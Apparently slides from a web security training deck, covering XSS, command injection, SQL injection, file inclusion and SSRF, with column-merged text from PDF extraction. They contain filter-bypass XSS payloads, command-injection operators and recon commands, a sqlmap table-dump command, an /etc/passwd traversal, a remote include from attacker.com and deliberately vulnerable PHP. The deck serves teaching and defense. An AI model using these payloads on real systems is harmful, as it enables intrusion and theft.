WEB

SECURITY
 CROSS-SITE SCRIPTING
CONTINUED
How to Exploit?

Find parameter
Find Input field
Check for injection
Check the context
Attempt to exploit
 XSS CONTINUED
What if <script> tag is blocked in the code?

We can use <sCriPT>. Sometimes developers block the <script>

tag, thinking that if an attacker can't use the <script> tag, it will
prevent XSS. But we can still use <sCripT> as the server will
process it as <script>.
 XSS CONTINUED
What if <alert> tag is blocked in the code?

We can use prompt.

 XSS CONTINUED
What if <script>, prompt, alert all tags are blocked in the code?

We can use double scripts and alerts. For example: <scrscriptipt>

and alealertrt(). Whenever the backend detects any script, it will
remove it. So <scrscriptipt> will become <script> as the script will
be removed. The same applies to alert as well.
 XSS CONTINUED
XSS in Error Messages

Sometimes error messaged are shown in para meter. If the

parameter is not sanitized to user input, we can inject there.
 XSS CONTINUED
XSS in Header

Sometimes error messages are shown in parameters. If the

parameter is not sanitized to user input, we can inject there.

Have you ever noticed SQL error messages on a webpage? Do

the values reflected in the error message correspond to the
reason for the error?
 XSS CONTINUED
XSS in File Upload

This can be done in two ways. Sometimes webpage print the

file name after being uploaded. For example: File ‘xyz’ has
been uploaded successfully.

Sometimes website checks exif data of a file. We can inject in

the file.
 XSS CONTINUED
VAPT Test Cases
TEST CASE 1: REFLECTED ERROR MESSAGE

TEST CASE 2: USER INPUT RETURNED WITHOUT FILTERING

TEST CASE 3: XSS VIA FILE UPLOAD

TEST CASE 4: XSS THROUGH SVG

More Readings:

https://noobsec.notion.site/Introduction-to-XSS-By-Mehedi-Hasan-42a1a052ec80430fa7d31358f04a9fae?pvs=4

https://noobsec.notion.site/XSS-writeup-by-Mehedi-Hasan-509e4e90d90747869d589e41f6b52d27?pvs=4
 XSS CONTINUED
Code Review
<?php include 'includes/header.php';?>
<?php include 'includes/header.php';?> <?php include 'includes/navbar.php';?>
<?php include 'includes/navbar.php';?> <?php
<?php if(!isset($_GET['welcome'])) {
if(isset($_GET['status'])) { header('Location: 4.php?welcome=Welcome');
} else { }
header('Location:'.$_SERVER['PHP_SELF'].'?'.'status=hello'); ?>
die; <?php
} if(isset($_GET['welcome'])) {
?> $welcome = $_GET['welcome'];
<?php $welcome = preg_replace('/script/', '', $welcome);
echo "<br>Value : "; $welcome = preg_replace('/img/', '', $welcome);
if(isset($_GET['status'])) { $welcome = preg_replace('/alert/', '', $welcome);
$status = $_GET['status']; $welcome = preg_replace('/prompt/', '', $welcome);
echo $status; echo $welcome;
} }
?> ?>
<?php include 'includes/footer.php';?> <?php include 'includes/footer.php';?>

Code Review 1
Code Review 2
 XSS CONTINUED
Impact and Prevention

Impact: DEFENSE:

Account hijacking 1. INPUT SANITIZATION

Credentials stealing 2. ATTRIBUTE ENCODING
Sensitive data exposures 3. IMPLEMENTING CSP
Accessing client computer 4. HTML ENCODING
… and many more
 COMMAND INJECTION
OS command injection — is a web vulnerability that allows an
attacker to execute arbitrary operating system (OS) commands on
the server running the vulnerable application, often the application
and all data are completely compromised. It occurs when
applications cannot properly validate and sanitize the parameters
they use when calling shell functions such as system () or exec () to
execute system commands.
 COMMAND INJECTION
To exploit a command injection vulnerability, we need to there are
multiple way to add more commands:

command1 && command2 that will run command2 if command1 succeeds.

command1 || command2 that will run command2 if command1 fails.
command1 ; command2 that will run command1 then command2.
command1 | command2 that will run command1 and send the output
of command1 to command2.
COMMAND INJECTION TYPES
Error-based injection: When an attacker injects a command through an
input parameter and the output of that command is displayed on the
certain web page, it proves that the application is vulnerable to the
command injection.

Blind-based Injection: The results of the commands that you inject will
not be displayed to the attacker and no error messages are returned. The
attacker might use another technique to identify whether the command
was really executed on the server or not.
 COMMAND INJECTION
Steps to Exploit

Identify the input field or parameter

Understand the functionality
Try the Ping method time delay
Use various operators to exploit OS Command Injection
 COMMAND INJECTION
The following list compiles popular functions attacked during
command injection:
system, execlp,execvp, ShellExecute, _wsystem C/C++

Runtime.exec Java

exec, eval PHP

exec, open, eval, Perl

exec, eval, execfile, input Python

Shell, ShellExecuteForExplore, ShellExecute VB

 COMMAND INJECTION
Possible Parameters to look for:

daemon=, host=, upload=, to=,

dir=, execute=, download=, log=,
ip=, cli=, cmd=, path=, username=,
uri=, url=

Commands to try
Windows
Linux
whoami
whoami ver
id ipconfig
ifconfig/ip addr tasklist
uname -a netstat -an
ps -ef
COMMAND INJECTION

Lab: security-vault.security-pedia.com
 COMMAND INJECTION
Impact:
Defense:
The impact of command
injection can be devastating, Input Validation and
allowing attackers to execute Sanitization
unauthorized commands with Parameterized Queries
the same privileges as the Least Privilege Principle
vulnerable application or Input Validation on the Server
service. This can lead to data and Client Side
breaches, unauthorized access Content Security Policy (CSP)
to sensitive information, Web Application Firewalls (WAF)
manipulation or deletion of
files, disruption of services,
and even complete
compromise of the affected
system.
 SQL INJECTION
A SQL injection occurs when a malicious user attempts to pass
input that changes the final SQL query sent by the web application
to the database, enabling the user to perform other unintended
SQL queries directly against the database.

There are many ways to accomplish this. To get a SQL injection to

work, the attacker must first inject SQL code and then subvert the
web application logic by changing the original query or executing a
completely new one. First, the attacker has to inject code outside
the expected user input limits, so it does not get executed as simple
user input. In the most basic case, this is done by injecting a single
quote (') or a double quote (") to escape the limits of user input and
inject data directly into the SQL query.
 SQL INJECTION
Mainly Three Types
Error Based: Error-based SQL Injections obtain information about the
database structure from error messages issued by the database server.
In rare circumstances, an attacker may enumerate an entire database
using only error-based SQL injection.

Union Based: Union-based SQL Injections use the UNION SQL operator
to aggregate the results of two or more SELECT queries into a single
result, which is subsequently returned as part of the HTTP response.

Blind: Boolean-based SQL Injection works by submitting a SQL query to

the database and forcing the application to produce a different
response depending on whether the query returns TRUE or FALSE.
 INJECTION
SQL Statements

Before Jumping into SQLI, Let’s learn SQL:

SQL (Structured Query Language) is a feature-rich language used for querying databases, these SQL queries are better
referred to as statements. We will learn some basic SQL queries.

Let’s assume an users table-

id username password id username password username password

1 admin 1234 1 admin 1234 admin 1234

2 tom 12345 2 tom 12345 tom 12345

3 jerry 123456 3 jerry 123456 jerry 123456

Table: Users SELECT * FROM USERS; SELECT USERNAME, PASSWORD

FROM USERS;
 INJECTION
SQL Statements

id username password id username password id username password

1 admin 1234 1 admin 1234 2 tom 12345

SELECT * FROM USERS LIMIT 1; select * from users where username = 3 jerry 123456
'admin';
select * from users where username !=
'admin';
Let’s assume another table

id fullname address
id username fullname address
Some other
1 Mehedi Hasan abc
1 admin Mehedi Hasan abc query-
INSERT,
2 Bruce Lee xyz
2 tom Bruce Lee xyz UPDATE,
DELETE
3 Alex Nail axy
3 jerry Alex Nail axy

Table: user_details select id, username from users union select fullname, address
from user_details;
 SQL INJECTION
How to Detect?

https://noobsec.notion.site/SQLI-Notes-8cebcebce0394e31b66e96971c32cf02?
pvs=4
 SQLMAP
Scenario Description Example Command

Using SQLMap
Capture the request with Burp Suite and save it in a file
with a login sqlmap -r request.txt
(request.txt).
page

Execute SQLMap using the -r flag followed by the filename.

Crawling a sqlmap -u
Execute SQLMap with the -u flag followed by the URL and --
page to find http://example.com --
crawl=1 to enable crawling.
injections crawl=1

Execute SQLMap with the -r flag followed by the filename, -p flag

Dumping a sqlmap -r request.txt -p
specifying the parameter vulnerable to injection, --dbms to
database or username --dbms=mysql --
specify the database management system, --dump to dump data,
table dump -D Webapp -T Users
-D to specify the database, and -T to specify the table.

Use the --proxy flag followed by the proxy server address to sqlmap --
Using a proxy
route requests through a proxy. proxy="x.x.x.x:yyyy"
SQLI LAB
 SQL INJECTION
Authentication Bypass

Lab: https://juice-shop.herokuapp.com/
 SQL INJECTION
Impact:

Successful exploitation allows attackers to read, tamper with, or

modify data, execute administrative operations on databases, and
potentially gain access to the operating system.
Consequences include breaches of confidentiality and loss of
integrity, jeopardizing sensitive data.

Defense:

Prevention measures are relatively easy to implement. Most cases of

SQLi can be evaded by adopting frameworks that interact with the
database and parameterized queries (also known as prepared
statements), instead of string series within the query.
 FILE INCLUSION
File include vulnerabilities come from a lack of filtering when a
user-controlled parameter is used as part of a file name in a call to
an including function (require, require_once, include or
include_once in PHP for example). If the call to one of these
methods is vulnerable, an attacker will be able to manipulate the
function to load his own code. File include vulnerabilities can also
be used as a directory traversal to read arbitrary files. However, if
the arbitrary code contains an opening PHP tag, the file will be
interpreted as PHP code.
 FILE INCLUSION EXAMPLE
A simple example

A vulnerable web application has the endpoint /page?file=

{filename}
When a request is made, the application dynamically includes
the content of the file specified in the query parameter, for
example, PHP's include() function: include($filename);
If an attacker modifies {filename} to a path such as
../../etc/passwd or a remote URL
http://attacker.com/malicious.php, they can read sensitive files
or execute malicious code.
 FILE INCLUSION
Impact and Prevention
Local file inclusion (LFI)
vulnerabilities allow an attacker to
read local files on the web server
using malicious web requests, such
as:
Web configuration files
Log files
Password files
Other sensitive system data
Defense:
Validate and sanitize user-supplied
file paths.
Use whitelists for allowed files and
directories.
Set strict file permissions to limit
access.
Disable PHP allow_url_include.
Use absolute paths instead of
relative paths.
Filter input to remove malicious
characters.
 SERVER SIDE REQUEST
FORGERY
Server-Side Request Forgery (SSRF) is a vulnerability that allows an
attacker to induce the server-side application to make HTTP requests to
an arbitrary domain of the attacker's choosing. It can be used by an
attacker to interact with internal systems, possibly bypassing firewalls or
accessing unauthorized data.

A SIMPLE EXAMPLE

A vulnerable web application uses a parameter to retrieve an image from

a URL, i.e., /loadImage?url={imageURL}. An attacker can potentially
change the {imageURL} to point to internal resources that should not be
exposed, such as http://localhost/admin or http://internal-
service/api/secrets.
THANK YOU